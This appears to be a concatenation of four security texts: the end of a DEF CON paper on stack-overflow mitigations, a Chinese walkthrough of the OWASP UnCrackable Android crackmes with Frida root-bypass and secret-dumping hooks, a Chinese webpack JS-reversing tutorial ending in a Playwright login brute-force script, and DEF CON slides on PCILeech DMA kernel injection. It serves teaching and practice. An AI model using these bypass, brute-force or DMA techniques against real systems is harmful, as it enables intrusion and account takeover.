importance of integrating security review into the development lifecycle, using both manual
review and static code analysis.
In GCC, the RedHat-developed FORTIFY_SOURCE extension looks for a number of exploitable
conditions at compile time, and when paired with its glibc counterpart, can identify if a buffer
with a defined length is mishandled and stop execution, by replacing oft-abused functions with
their checking counterparts. FORTIFY_SOURCE will also warn for conditions it deems suspect but
cannot protect. OpenBSD has taken similar steps by replacing commonly exploited functions like
strcat() / strcpy() with fixed-size alternatives.
A number of vendor products also use automated code analysis to identify security holes.
Recently the US Department of Homeland Security invested $1.25 million in a joint project
between Stanford, Coverity, and Symantec to search Open Source projects for security bugs. In
1999, as part of its security push, Microsoft purchased code analysis toolmaker Intrinsa outright,
and made static analysis an integrated part of their QA process.
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 10 of 13
0x09: The sum of the whole is partially great.
If security in depth is the sum of a number of imperfect controls, then the controls described
here should all certainly qualify. Each has been proven insufficient in a vaccuum, but the
aggregate of a nonexecutable stack, ASLR, canary-based protection of pointer values, and static
code analysis should still serve to create an environment that is more hostile to overflows than
what has previously been available… The key weaknesses now seem to be in a lack of
consistency of adoption and implementation.
A remotely-exploitable stack-based overflow in ANI cursor handling in Vista, found by Alexander
Sotirov, was due in part to Visual Studio’s /GS checks not protecting buffers that write to
structures rather than arrays. Also, as NX and DEP have become more ubiquitous, heap
exploitation and other alternatives have gained renewed interest as well.
OpenBSD elected to omit kernel stack randomization, though it was adopted by PaX, due to
questions about whether it broke POSIX compliance. In recent months OpenBSD was found
vulnerable to a number of vulnerabilities in the kernel – one such example is being presented this
year at BlackHat. While I’m sure the OpenBSD camp will have an alternative answer, it seems to
me that a randomized kstack might have at least raised the bar a bit.
OS X has benefited from relative obscurity for some time, but with increasing marketshare and
minimal overflow protection beyond an optional integration with NX, it’s likely to become an
attractive target – attacks refined a number of years ago are relatively trivial to implement, when
compared to exploiting the same bugs on other platforms.
In time, as always, new attacks will create new countermeasures, and the security ecosystem will
continue to evolve, in fits and starts, as it always has, from RFC1135, to Aleph One, and on.
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 11 of 13
// Notes and references
Thanks for reading. I hope this paper was helpful to you. It’s the result of my attempt to better
understand what protections were out there for my own systems and those under my care, and
to get all of this information in one spot, which is something I couldn’t find a year ago when I got
interested in this topic.
Here’s a starting point for some of the information referenced in this paper. The BH CD also
contains copies of these and a lot of other supporting material. In addition to these, I’d highly
recommend reading Jon Erickson’s excellent Hacking: The Art of Exploitation, and The
Shellcoder’s Handbook, edited by Jack Koziol.
– shawn
NX Bit, PaX, and SSP on Wikipedia
http://en.wikipedia.org/wiki/NX_bit
http://en.wikipedia.org/wiki/PaX
http://en.wikipedia.org/wiki/Stack-smashing_protection
PaX: The Guaranteed End of Arbitrary Code Execution
Brad Spengler
http://grsecurity.net/PaX-presentation.ppt
PaX documentation repository:
http://pax.grsecurity.net/docs/
Edgy and Proactive Security
John Richard Moser
http://www.nabble.com/Edgy-and-Proactive-Security-t1728145.html
What’s Exploitable?
Dave LeBlanc
http://blogs.msdn.com/david_leblanc/archive/2007/04/04/what-s-exploitable.aspx
On the Effectiveness of Address-Space Layout Randomization
Shacham et al.
http://crypto.stanford.edu/~dabo/abstracts/paxaslr.html
Defeating Buffer-Overflow Protection Prevention Hardware
Piromposa / Enbody
http://www.ece.wisc.edu/~wddd/2006/papers/wddd_07.pdf
ByPassing PaX ASLR
“Tyler Durden”
http://www.phrack.org/archives/59/p59-0x09.txt
Johnson and Silberman BH talk on Overflow Protection Implementations
http://rjohnson.uninformed.org/blackhat/
Exploit mitigation techniques in OBSD
Theo DeRaadt
http://www.openbsd.org/papers/ven05-deraadt/index.html
Ubuntu USN analysis listing type of exploit (45% buffer overflows)
John Richard Moser
https://wiki.ubuntu.com/USNAnalysis
Crispin Cowan’s StackGuard paper,
USENIX Security 1998
http://www.usenix.org/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 12 of 13
Detecting Heap Smashing Attacks through Fault Containment Wrappers:
http://ieeexplore.ieee.org/iel5/7654/20915/00969756.pdf
ContraPolice: a libc Extension for Protecting Apps from Heap-Smashing attacks
http://synflood.at/papers/cp.pdf
Effective protection against heap-based buffer overflows without resorting to magic
Younan, Wouter, Piessens
http://www.fort-knox.be/files/younan_malloc.pdf
l0t3k site with lots of linkage on BoF’s
http://www.l0t3k.org/programming/docs/b0f/
How to write Buffer Overflows
Peter Zaitko / Mudge
http://insecure.org/stf/mudge_buffer_overflow_tutorial.html
Defeating Solar Designer’s NoExec stack patch
http://seclists.org/bugtraq/1998/Feb/0006.html
Solar Designer / Owl Linux kernel patchset
http://openwall.com/linux/
Theo’s hissy fit justifying ProPolice in OBSD to Peter Varga
http://kerneltrap.org/node/516
Stack-Smashing Protection for Debian
http://www.debian-administration.org/articles/408
IBM ProPolice site:
http://www.trl.ibm.com/projects/security/ssp/
Four different tricks to bypass StackGuard and StackShield
http://www.coresecurity.com/index.php5?module=ContentMod&action=item&id=1146
Smashing the Stack for Fun and Profit
Elias Levy / Aleph One
http://www.phrack.org/archives/49/P49-14
Stack Smashing Vulnerabilities in the Unix Operating System
Nathan P. Smith
http://community.corest.com/~juliano/nate-buffer.txt
RFC 1135
http://www.faqs.org/rfcs/rfc1135.html
Gene Spafford’s analysis of the Morris Worm
http://homes.cerias.purdue.edu/~spaf/tech-reps/823.pdf
Shawn Moyer :: (un)Smashing the Stack :: DefCon 0x0F :: Page 13 of 13 | pdf |
android UnCrackable
OWASPcrackmeapp
Githubhttps://github.com/OWASP/owasp-mstg/tree/master/Crackmes
: https://pan.baidu.com/s/1YCiUU2Xy2xBSUQNxric8mQ : 81kn
pixel xl arm64-v8a
python 3.8.0
frida 12.8.0
java 11.0.8
jadx 1.1.0
IDA 7.0
Ghidra 9.1.2
Android Level 1
UnCrackable1
javaroot
jadxfrida
owasp-mstg/Crackmes/Android/Level_01(master*) » adb install UnCrackable-
Level1.apk
Performing Streamed Install
Success
root
root
jadxapk root
c.a\c.b\c.croot
···
public void onCreate(Bundle bundle) {
if (c.a() || c.b() || c.c()) {
a("Root detected!");
}
if (b.a(getApplicationContext())) {
a("App is debuggable!");
}
super.onCreate(bundle);
setContentView(R.layout.activity_main);
}
···
rootfridahook
package sg.vantagepoint.a;
import android.os.Build;
import java.io.File;
public class c {
public static boolean a() {
for (String file : System.getenv("PATH").split(":")) {
if (new File(file, "su").exists()) {
return true;
}
}
return false;
}
public static boolean b() {
String str = Build.TAGS;
return str != null && str.contains("test-keys");
}
public static boolean c() {
sg.vantagepoint.a.croot
cabchookfalse
frida
for (String file : new String[]{"/system/app/Superuser.apk",
"/system/xbin/daemonsu", "/system/etc/init.d/99SuperSUDaemon",
"/system/bin/.ext/.su", "/system/etc/.has_su_daemon",
"/system/etc/.installed_su_daemon",
"/dev/com.koushikdutta.superuser.daemon/"}) {
if (new File(file).exists()) {
return true;
}
}
return false;
}
}
Java.perform(function () {
send("hook start");
var c=Java.use("sg.vantagepoint.a.c");
//false
c.a.overload().implementation = function(){
return false;
}
c.b.overload().implementation = function(){
return false;
}
c.c.overload().implementation = function(){
return false;
}
send("hook end");
});
frida frida -U -f owasp.mstg.uncrackable1 --no-pause -l uncrackable1.js
hookVERIFYThat's not it.Try
again.
jadxTry again
verifya.a(obj)a
1frida hook
frida
uncrackable1.js
frida
public static boolean a(String str) {
byte[] bArr;
byte[] bArr2 = new byte[0];
try {
bArr =
sg.vantagepoint.a.a.a(b("8d127684cbc37c17616d806cf50473cc"),
Base64.decode("5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=", 0));
} catch (Exception e) {
Log.d("CodeCheck", "AES error:" + e.getMessage());
bArr = bArr2;
}
return str.equals(new String(bArr));
}
var a =Java.use("sg.vantagepoint.a.a");
a.a.overload('[B', '[B').implementation=function(arg1,arg2){
//
var ret = this.a(arg1,arg2);
//
console.log(jhexdump(ret));
return ret;
}
// owasp.mstg.uncrackable1
// hookroot
function hookrootuncrackable1(){
Java.perform(function () {
send("hook start");
var c=Java.use("sg.vantagepoint.a.c");
//false
c.a.overload().implementation = function(){
return false;
}
var a =Java.use("sg.vantagepoint.a.a");
/**
* overload
* Error: a(): argument count of 0 does not match any of:
.overload('[B', '[B')
at throwOverloadError (frida/node_modules/frida-java-bridge/lib/class-
factory.js:1020)
at frida/node_modules/frida-java-bridge/lib/class-factory.js:686
at /uncrackable1.js:13
at frida/node_modules/frida-java-bridge/lib/vm.js:11
at E (frida/node_modules/frida-java-bridge/index.js:346)
at frida/node_modules/frida-java-bridge/index.js:332
at input:1
*/
a.a.overload('[B', '[B').implementation=function(arg1,arg2){
//
var ret = this.a(arg1,arg2);
console.log(jhexdump(ret));
// console.log(byte2string(ret));
/***
* retval = this.a(arg1, arg2);
password = ''
for(i = 0; i < retval.length; i++) {
password += String.fromCharCode(retval[i]);
}
console.log("[*] Decrypted: " + password);
*/
return ret;
}
send("hook end");
});
}
function jhexdump(array,off,len) {
var ptr = Memory.alloc(array.length);
for(var i = 0; i < array.length; ++i)
Memory.writeS8(ptr.add(i), array[i]);
//console.log(hexdump(ptr, { offset: off, length: len, header: false,
ansi: false }));
console.log(hexdump(ptr, { offset: 0, length: array.length, header: false,
ansi: false }));
}
function main(){
hookrootuncrackable1();
}
setImmediate(main)
// owasp.mstg.uncrackable1
//frida -U -f owasp.mstg.uncrackable1 --no-pause -l uncrackable1.js
~ » frida -U -f owasp.mstg.uncrackable1 --no-pause -l uncrackable1.js
____
/ _ | Frida 12.8.0 - A world-class dynamic instrumentation toolkit
| (_| |
I want to believe
> _ | Commands:
/_/ |_| help -> Displays the help system
. . . . object? -> Display information about 'object'
. . . . exit/quit -> Exit
. . . .
. . . . More info at https://www.frida.re/docs/home/
Spawned `owasp.mstg.uncrackable1`. Resuming main thread!
[Google Pixel XL::owasp.mstg.uncrackable1]-> message: {'type': 'send',
'payload': 'hook start'} data: None
message: {'type': 'send', 'payload': 'hook end'} data: None
7062ac63b0 49 20 77 61 6e 74 20 74 6f 20 62 65 6c 69 65 76 I want to believ
7062ac63c0 65 e
2.aes
https://www.codemetrix.io/hacking-android-apps-with-frida-2/
FRIDAAndroid
Android Level 2
UnCrackable2
javarootso
jadxfridaIDAGhidra
» echo 5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc= | openssl enc -aes-128-
ecb -base64 -d -nopad -K 8d127684cbc37c17616d806cf50473cc
I want to believe%
adb install UnCrackable-Level2.apk
root
jadxUnCrackable-Level2.apk~ jadx-gui UnCrackable-Level2.apk
Root detected!
fridahook
frida
Java.perform(function(){
var b=Java.use("sg.vantagepoint.a.b");
b.a.overload().implementation = function(){
return false;
}
b.b.overload().implementation = function(){
return false;
}
b.c.overload().implementation = function(){
return false;
}
});
Try again
verify()
···
if (this.m.a(obj)) {
create.setTitle("Success!");
str = "This is the correct secret.";
} else {
create.setTitle("Nope...");
str = "That's not it. Try again.";
}
···
abarnativesoIDA
UnCrackable-Level2.apk
Level_02/UnCrackable-Level2/lib/armeabi-v7alibfoo.soIDA
bar
private native boolean bar(byte[] bArr);
public boolean a(String str) {
return bar(str.getBytes());
}
F5c
Thanks for all the fish Success
IDAGhidra
bar
6873696620656874206c6c6120726f6620736b6e616854
https://zixuephp.net/tool-str-hex.html
16
https://gchq.github.io/CyberChef
hsif eht lla rof sknahT
Thanks for all the fish
https://tereresecurity.wordpress.com/2021/03/23/write-up-uncrackable-level-2/
https://enovella.github.io/android/reverse/2017/05/20/android-owasp-crackmes-level-2.html
https://www.codemetrix.io/hacking-android-apps-with-frida-3/
FRIDAAndroid
LINKS
[]UnCrackable App
OWASP Android Uncrackable1~3 | pdf |
JS逆向 | WebPack站点实战(⼀)
收录于合集
#JS逆向
4个
⽂章配套B站视频,很多话语简略了,建议配着视频看。
地址:https://www.bilibili.com/video/BV13F411P7XB/
开始之前了,简单过⼀下下⾯⼏个⽅法加深印象,便于更好理解加载器。也可以直接从
webpack标题开始看起。
Function/函数/⽅法
常规的js函数命名⽅法:
//1. 常规function
var test = function(){
console.log(123);
}
function test(){
console.log(2);
}
今天的主⻆,⾃执⾏函数。
//2. ⾃执⾏function
!function(){
console.log(1);
}()
きっとまたいつか
Depapepe
2022-08-07 09:46 发表于北京
原创
不愿透露姓名的热⼼⽹友 ⼀位不愿透露姓名的热⼼⽹友
}()
// => function a(){} a()
//2.1
!function(e){
console.log(e)
var n={
t:"txt",
exports:{},
n:function(){console.log("function n ")}
}
}("echo this")
//2.2
!function(e){
console.log(e)
var n={
t:"txt",
exports:{},
n:function(){console.log("function n ")}}
}(
{
"test":function(){
console.log("test")}
}
)
//(["test":function(){console.log])
call/apply Function
[Fcuntion prototype call and applay ](Function.prototype.call() - JavaScript | MDN
(mozilla.org))
允许为不同的对象分配和调⽤属于另⼀个对象的函数/⽅法。
call和apply的使⽤效果基本⼀致,可以让A对象调⽤B对象的⽅法:
让 Vx 对象调⽤ _x 对象的 say() ⽅法
var Vx={
name:"⼀位不愿透露姓名的热⼼⽹友",
age:"18cm"
};
var _x={
name:"热⼼⽹友",
age:"18mm",
say:function(){console.log("name:"+this.name+" age:"+this.age)}
}
_x.say.call(Vx)
//name:⼀位不愿透露姓名的热⼼⽹友 age:18cm
Webpack
webpack ⼀个静态模块打包器,有⼊⼝、出⼝、loader 和插件,通过loader加载器对js、
css、图⽚⽂件等资源进⾏加载渲染。
实战站点:https://spa2.scrape.center/
WebPack 站点⻓什么样
⽅法1. 右键查看源码发现只会有js链接⽂件,没有其他多余的前端信息,f12看元素就会有
很多数据。
⽅法2. 看Js⽂件,⼀般会有⼀个app.xxxx.js或⻓得像MD5的⽂件名,然后js内容有很多a、b、
c、d、n...的变量来回调⽤,反正就是看着乱。
loader加载器
Webpack站点与普通站点的JS代码扣取是不⼀样的,因为Webpack站点的资源加载是围绕着加
载器进⾏的,然后把静态资源当作模块传⼊调⽤,传⼊的模块就是参数,需要加载什么就运⾏
什么模块。
先简单看⼀下加载器⻓相。
!function(e){
var t={}
function d(n){
if (t[n])
return t[n].exports;
console.log(n)
var r = t[n] = {
i:n,
l:!1,
exports:{}
};
return e[n].call(r.exports,r,r.exports,d),
r.l = !0;
r.exports
}
d(1)
}(
[
function(){console.log("function1");console.log(this.r.i)},
function(){console.log("function2")}
]
);
加载器分析
将加载器拆分为两部分:
函数⽅法部分:
!function(e){
var t={}
function d(n){
if (t[n])
return t[n].exports;
var r = t[n] = {
i:n,
l:!1,
exports:{}
};
return e[n].call(r.exports,r,r.exports,d),
r.l = !0;
r.exports
}
d(1)
参数部分:
(
[
function(){console.log("function1");console.log(this.r.i)}
,
function(){console.log("function2")}
]
)
/* 这⾥的参数可以是传⼊数组,也可以是对象,都是经常看⻅的。
*/
(
{
"1":function(){console.log("function1");console.log(this.r.i)}
,
"2":function(){console.log("function2")}
}
)
这⾥的加载器是将参数作为⼀个数组【】传⼊的,格式为: !function(e){}(数组) 参数e就
是传⼊的数组, 接着看:
var t={}
function d(n){
if (t[n])
return t[n].exports;
var r = t[n] = {
i:n,
l:!1,
exports:{}
};
return e[n].call(r.exports,r,r.exports,d),
r.l = !0;
r.exports
}
d(1)
上述代码声明了⼀个d⽅法并执⾏,传⼊ 1 作为参数, d ⽅法中的 if (t[n]) 并没有实际意
义,因为 t 本来就没有声明的,可以缩减为:
function d(n){
var r = t[n] = {
i:n,
l:!1,
exports:{}
};
return e[n].call(r.exports,r,r.exports,d),
r.l = !0;
r.exports
}
d(1)
那么 r=t[n]={ xxxx} 可以变成 var r = { xxx} ,现在就剩下⼀句:
return e[n].call(r.exports,r,r.exports,d)
前⾯说过了, e 是传⼊的参数,也就是数组; n 是 d(1) 传⼊的值,为 1 。
r.exports 就是 r 对象⾥的 exports 属性为空对象 {} 。
转化代码:
return 数组[1].call({},r对象,{},d函数⾃⼰)
--> 继续转换:
function(){
console.log("function2")
}.call({},r对象,{},d函数)
由于 call() ⽅法是⽤于调⽤⽅法的,所以其他参数可以忽略,缩减为:
function(){
console.log("function2")
}.call(d函数)
加载器并没有太多实际的意义,就是⾃⼰调⽤⾃⼰,只是⽤来混淆的;
经过分析后代码可以直接缩减为(当然,只是针对现在这个例⼦):
!function(e){
!function(e){
var t={}
console.log("⾃执⾏传⼊的参数是:"+e)
function d(n){
return e[n].call(d)
}
d(1)
}(
[
function(){console.log("function1");console.log()},
function(){console.log("function2")}
]
);
分离加载
在模块较多的情况下,webpack会将模块打包成⼀整个JS模块⽂件;并使⽤ Window 对象的 we
bpackJsonp 属性存储起来。然后通过 push() ⽅法传⼊模块。
如下:
格式为:
(window["webpackJsonp"] =
window["webpackJsonp"] || [] ).push([
["xx"], {
"module":function(){}
}
]);
运⾏结果:可以理解为appen追加内容,向webpackJsonp属性追加了[xx],和mod数组
总结
通过两个加载器的两个例⼦可以看出,加载器的重要性;webpack站点能否成功解析,是
围绕着loader加载器和模块资源进⾏的,加载器好⽐是⼀⼝锅,⽽模块好似⻝材;将不⼀
样的⻝材放⼊锅中,烹饪的结果都是不⼀样的。
WebPack实战
分析加密
Webpack站点分析的思路主要以下两点:
1. ⾸先找到⻝材,也就是定位到加密模块
2. 其次找到锅,loader加载器
3. 使⽤加载器去加载模块
在这⾥的的难点就是定位加密模块,因为调⽤加密的地⽅肯定是只有固定的⼀两个点,如:登
录提交。⽽加载器则什么地⽅都在调⽤(⽹站图⽚、css、js等资源 都是通过加载器加载出来
的)
在上⼀⽂《JS逆向|40分钟视频通杀⼤⼚登陆加密》视频中已经讲解了常规加密的快速定位办
法,在webpack站点中使⽤这种定位办法也有概率可能会有效,其实加密点也是有规律的,
如:
//1.
xxxxx{
a:e.name,
data:e.data,
b:e.url,
c:n
}
这种键值对格式的跟ajax请求⻓得很相似,有可能是请求赋值的地⽅,也不绝对,只是⼤家注
意就好。
访问站点右键源码就能发现这是⼀个webpack⽹站,数据并不存在于源码之中,是通过XHR获
取的JSON数据。
发现是这么⼀个URL请求的:
https://spa2.scrape.center/api/movie/?limit=10&offset=0&token=ODkxMjNjZGJhYjExNjRkYTJiMmQ
翻⻚观察发现, limit 固定不变, offset 每次增加 10 。两个参数分别是展示的数量与展
示的开始位置, token 是什么信息暂时未知,但是是必须要解开是。
通过XHR⽹络断点对所有XHR请求URL进⾏匹配,只要URL内包含 api/movie 关键词就进⾏
下断。
成功断下会展示具体在哪个uRL断的
观察堆栈挨个找
具体找法视频内会详细讲,⽂字太麻烦了 :sleepy:,⼀系列操作之后,定位到了加密位置 onFe
tchData :
Object(i["a"])(this.$store.state.url.index, a)
this.$store.state.url.index 和 e 分别是 /api/movie , 0 ( url 中的 offset 翻⻚
值)
加密算法也就是: Object(i["a"]) ⽅法
现在把i()的内容扣下来就搞定了,但是 i ⽅法⾥有 n 的调⽤
var o = n.SHA1(r.join(",")).toString(n.enc.Hex),
c = n.enc.Base64.stringify(n.enc.Utf8.parse([o, t].join(",")));
主要就是这两句, n 也是我们需要的,查找⼀下 n 得值来源,把 n 也扣取下来
var n = r("3452");
r ⼜是啥?下个断点重新运⾏看看。
r 如果跟过去发现是⼀个加载器⽅法:
function c(t) {
if (r[t])
return r[t].exports;
var n = r[t] = {
i: t,
l: !1,
exports: {}
};
return e[t].call(n.exports, n, n.exports, c),
n.l = !0,
n.exports
}
⽽ r("3452") 跟过去,发现很多调⽤的 r(xxx) 的
这种情况下很多依赖类调⽤,如果扣不全很可能缺少某个类从⽽导致报错⽆法运⾏;在依赖少
的情况下可以选择缺啥补啥的原则,缺少什么⽅法就去找什么⽅法。依赖多的情况下也可以选
择把js代码全都摘下来,这样不管有没有⽤到的⽅法我代码⾥都有。但是⼗⼏万⾏代码运⾏肯
定会影响性能,具体优化办法后续会说明的。
扣取代码
由于案例站点依赖⽐较多,所以只能演示全扣的办法,⾸先我们把⼿上的信息整理⼀下:
加密⽅法为 :e = Object(i["a"])(this.$store.state.url.index, a);
//
⽽ Object(i["a"]) 在“7d29”模块⾥,为:
function i() {
for (var t = Math.round((new Date).getTime() / 1e3).toString(), e = arguments
r[i] = arguments[i];
r.push(t);
var o = n.SHA1(r.join(",")).toString(n.enc.Hex)
, c = n.enc.Base64.stringify(n.enc.Utf8.parse([o, t].join(",")));
return c
}
//
⾥⾯⼜⼜n的依赖调⽤, 为:r("3452");
//
r 为:加载器
function c(t) {
if (r[t])
return r[t].exports;
var n = r[t] = {
i: t,
l: !1,
exports: {}
};
return e[t].call(n.exports, n, n.exports, c),
n.l = !0,
n.exports
}
//
“3452"为模块⽅法:
3452: function(t, e, r) {
(function(e, n, i) {
t.exports = n(r("21bf"), r("3252"), r("17e1"), r("a8ce"), r("1132"), r("72fe"
}
)(0, (function(t) {
return t
}
))
}
3452 模块调⽤的其他依赖模块太多,直接选择把 chunk-4136500c.f3e9bb54.js ⽂件的所
有的模块拷⻉下来命名为: demo-model1.js , window 对象并不存在编译器中,记得 var w
indow=global 声明⼀下
把加载器扣出来,然后使⽤ require() 导⼊模块⽂件,然后设置⼀个全局变量 _c ,将加载
器 c 赋值 _c 导出运⾏可以发现报错:
第⼆个报错提示: at Object.3846 (d:\⽂稿\Js逆向\demo-model1.js:727:9) 模块⽂件的
727 ⾏报错
跟过来 727 ⾏发现⼜有其他模块调⽤,应该是缺少了 r("9e1e") 或者 r("86cc") 导致的
报错,
果然搜索也只有⼀个调⽤,没有声明的地⽅。那么⼜得取扣其他⻚⾯代码了。
全局搜索⽹⻚发现, 86cc 模块的在 chunk-vendors.77daf991.js ⽂件中被声明了,我们也
选择将这⽂件的所有模块拷⻉下来并命名为: demo-module2.js 。这两个扣完在编译器中基
本也不差模块了,两个js⽂件全都扣下来了。
⾃吐算法
上⾯完整分析了模块与加载器,可谓是你中有我我中有你;由于所有模块都需要经过加载
器后调⽤,所以根据这点特征;可以在调⽤某个加载模块时,设置⼀个全局变量,hook
所有接下来要调⽤的模块存储到变量后导出;
hook有⼀定的局限性,只能到加密⽅法调⽤附近进⾏hook。
window._load = c;
window._model = t.toString()+":"+(e[t]+"")+ ",";
c = function(t){
window._load = window._load + t.toString()+":"+(e[t]+"")+ ",";
return window._load(t);
}
⾃动化 | Playwright
[Playwright official doc ](Fast and reliable end-to-end testing for modern web apps |
Playwright)
站点源码: Burpy|⼀款流量解密插件 ,在不扣去加密算法时直接就进⾏爆破:
简单修改⼀下,将账户和密码都为123的密⽂放在后台固定写死,如果前端账户和密码都为
123就返回密⽂,不然返回error
安装好 Playwright 后cmd输⼊ python -m playwright codegen ,会弹出⼀个浏览器,访
问要爆破的URL。⾛⼀遍登录流程后, Playwright 会⾃动⽣成流程代码。
from playwright.sync_api import Playwright, sync_playwright, expect
def run(playwright: Playwright) -> None:
browser = playwright.chromium.launch(headless=False)
context = browser.new_context()
# Open new page
page = context.new_page()
# Click body
page.locator("body").click()
# Go to http://localhost:9988/
page.goto("http://localhost:9988/")
# Click input[name="userName"]
page.locator("input[name=\"userName\"]").click()
# Fill input[name="userName"]
page.locator("input[name=\"userName\"]").fill("123")
# Click input[name="passWord"]
page.locator("input[name=\"passWord\"]").click()
# Fill input[name="passWord"]
page.locator("input[name=\"passWord\"]").fill("345")
# Click input[type="submit"]
page.locator("input[type=\"submit\"]").click()
# ---------------------
context.close()
browser.close()
with sync_playwright() as playwright:
run(playwright)
上⾯代码实现很简单,主要的数据部分就是 fill() ⽅法,简单修改⼀下代码将账户密码变量
传⼊过去,然后做个循环即可。⾄于判断回显使⽤ page.on() 对 response 进⾏监听,根据
响应⻓度,密码错误回显为error五个字符⻓度,⼤于5则认为成功
运⾏结果:账户密码为123,123,加密密⽂为: PomtfmGnIAN54uvLYlgbH+CN/3mhNQdaAR/7
+vFOAuU=
关于接⼊验证码就不演示了,第三⽅像超级鹰这类的平台都已经将识别模块打包好,导⼊简单
修改就能⽤了,⽹上⽂章也相当多。
⻓按⼆维码识别关注我吧
往期回顾
JS逆向|40分钟视频通杀⼤⼚登陆加密
Burpy|⼀款流量解密插件
使⽤易语⾔开发⼀款远控软件
收录于合集 #JS逆向 4
喜欢此内容的⼈还喜欢
下⼀篇 · Burpy|⼀款流量解密插件
web⽇志⾃动化分析 ⽂末附福利优惠
轩公⼦谈技术
Python包管理⼯具之 PDM
运维开发故事
22个ES6知识点汇总,爆肝了
前端有道 | pdf |
Direct Memory Attack the KERNEL
by: ULF FRISK
Rise of the Machines:
Agenda
PWN LINUX, WINDOWS and OS X kernels by DMA code injection
DUMP memory at >150MB/s
PULL and PUSH files
EXECUTE code
OPEN SOURCE project
USING a $100 PCIe-card
About Me: Ulf Frisk
Penetration tester
Online banking security
Employed in the financial sector – Stockholm, Sweden
MSc, Computer Science and Engineering
Special interest in Low-Level Windows programming and DMA
Learning by doing project – x64 asm and OS kernels
Disclaimer
This talk is given by me as an individual
My employer is not involved in any way
PCILeech
PCILeech == PLX USB3380 DEV BOARD + FIRMWARE + SOFTWARE
PCIe
USB3
$78
No Drivers Required
>150MB/s DMA
32-bit (<4GB) DMA only
SLOTSCREAMER
PRESENTED by Joe Fitzpatrick, Miles Crabill @ DEF CON 2yrs ago
PCILeech compared to SLOTSCREAMER
SAME HARDWARE
DIFFERENT FIRMWARE and SOFTWARE
FASTER 3MB/s >150MB/s
KERNEL IMPLANTS
PCI Express
• PCIe is a high-speed serial expansion ”bus”
• Packet based, point-to-point communication
• From 1 to 16 serial lanes – x1, x4, x8, x16
• Hot pluggable
• Different form factors and variations
• PCIe
• Mini – PCIe (mPCIe)
• Express Card
• Thunderbolt
• DMA capable, circumventing the CPU
DMA – Direct Memory Access
Code executes in virtual address
space
PCIe DMA works with physical
(device) addresses
PCIe devices can access memory
directly if the IOMMU is not used
VT-d enabled
No VT-d (“normal”)
Firmware
• 46 bytes - This is the entire firmware !!!
• 5a00 = HEADER, 2a00 = LENGTH (little endian)
• 2310 4970 0000 = USBCTL register
• 0000 e414 bc16 = PCI VENDOR_ID and PRODUCT_ID (Broadcom SD-card)
• C810 … 0400 = DMA ENDPOINTS – GPEP0 (WRITE), GPEP1-3 (READ)
• 2110 d118 0190 = USB VENDOR_ID and PRODUCT_ID (18D1, 9001 = Google Glass)
Into the KERNELS
Most computers have more than 4GB memory!
Kernel Module (KMD) can access all memory
KMD can execute code
Search for code signature using DMA and patch code
Hijack execution flow of kernel code
PCIe DMA works with physical addresses
Kernel code run in virtual address space
The Stages 1-2-3
CALL stage_2_offset
E8 ?? ?? ?? ??
STAGE #1
(hooked function)
STAGE #2
(free space in kernel)
RESTORE STAGE #1
CMPXCHG (RET)
LOCATE KERNEL
ALLOCATE 0x2000
Write Physical Address & RET
WRITE STAGE #3 STUB
STAGE #3
LOOP: wait for DMA write
Set up DMA buffer 4MB/16MB
LOOP: wait for command
MEM READ
MEM WRITE
EXEC
EXIT
CREATE THREAD
Linux Kernel
Located in low memory
Location dependant on KASLR slide
#1 search for vfs_read (”random hook function”)
#2 search for kallsyms_lookup_name
#3 write stage 2
#4 write stage 1
#5 wait for stage 2 to return with physical address of stage 3
DEMO !!!
Linux DEMO
GENERIC kernel implant
PULL and PUSH files
DUMP memory
Windows 10
Kernel is located at top of memory
Problem if more than 3.5 GB RAM in target
Kernel executable not directly reachable …
PAGE TABLE is loaded below 4GB
Windows 10
• CPU CR3 register
point to physical address (PA) of PML4
• PML4E point to PA of PDPT
• PDPTE point to PA of PD
• PDE point to PA of PT
• PT contains PTEs (Page Table Entries)
• PML4, PDPT, PD, PT all < 4GB !!!
Windows 10
• Kernel address space starts at Virtual Address (VA) 0xFFFFF80000000000
• KASLR no fixed module VA between reboots
• PTE & 0x8000000000000007 == ”page signature”
• Driver always have same collection of ”page signatures” ”driver signature”
• Search for
”driver signature”
• Rewrite PTE
physical address
Windows 10 DEMO
PAGE TABLE rewrite to insert kernel module
EXECUTE code
DUMP memory
SPAWN system shell
UNLOCK
Windows 10
• Anti-DMA security features NOT ENABLED by default
• SECURE if virtualization-based security (credential/device guard)
is enabled
• Users may still mess around with UEFI
settings to circumvent on some
computers/configurations
OS X Kernel
Located in low memory
Location dependant on KASLR slide
Enforces KEXT signing
System Integrity Protection
Thunderbolt and PCIe is protected with VT-d (IOMMU)
DMA does not work! – what to do?
OS X – VT-d bypass
Apple has the answer!
Just disable VT-d
https://developer.apple.com/library/mac/documentation/HardwareDrivers/Conceptual/ThunderboltDevGuide/DebuggingThunderboltDrivers/DebuggingThunderboltDrivers.html
OS X
#1 search for Mach-O kernel header
#2 search for memcpy (”random hook function”)
#3 write stage 2
#4 write stage 1
#5 wait for stage 2 to return with physical address of stage 3
DEMO !!!
OS X DEMO
VT-d BYPASS
DUMP memory
UNLOCK
Mitigations
Hardware without DMA ports
BIOS DMA port lock down and TPM change detection
Firmware/BIOS password
Pre-boot authentication
IOMMU / VT-d
Windows 10 virtualization-based security
PCILeech: Use Cases
Awareness – full disk encryption is not invincible …
Excellent for forensics and malware analysis
Load unsigned drivers into the kernel
Pentesting
Law enforcement
PLEASE DO NOT DO EVIL with this tool
PCILeech
x64 target operating systems
Runs on 64-bit Windows 7/10
Read up to 4GB natively, all memory if assisted by kernel module
Execute code
Kernel modules for Linux, Windows, OS X
PCILeech
C and ASM in Visual Studio
Modular design
Create own signatures
Create own kernel implants
Minimal sample kernel implant
Key Takeaways
INEXPENSIVE universal DMA attacking is here
PHYSICAL ACCESS is still an issue
- be aware of potential EVIL MAID attacks
FULL DISK ENCRYPTION is not invincible
References
• PCILeech
• https://github.com/ufrisk/pcileech
• SLOTSCREAMER
• https://github.com/NSAPlayset/SLOTSCREAMER
• http://www.nsaplayset.org/slotscreamer
• Inception
• https://github.com/carmaa/inception
• PLX Technologies USB3380 Data Book
Questions and Answers? | pdf |
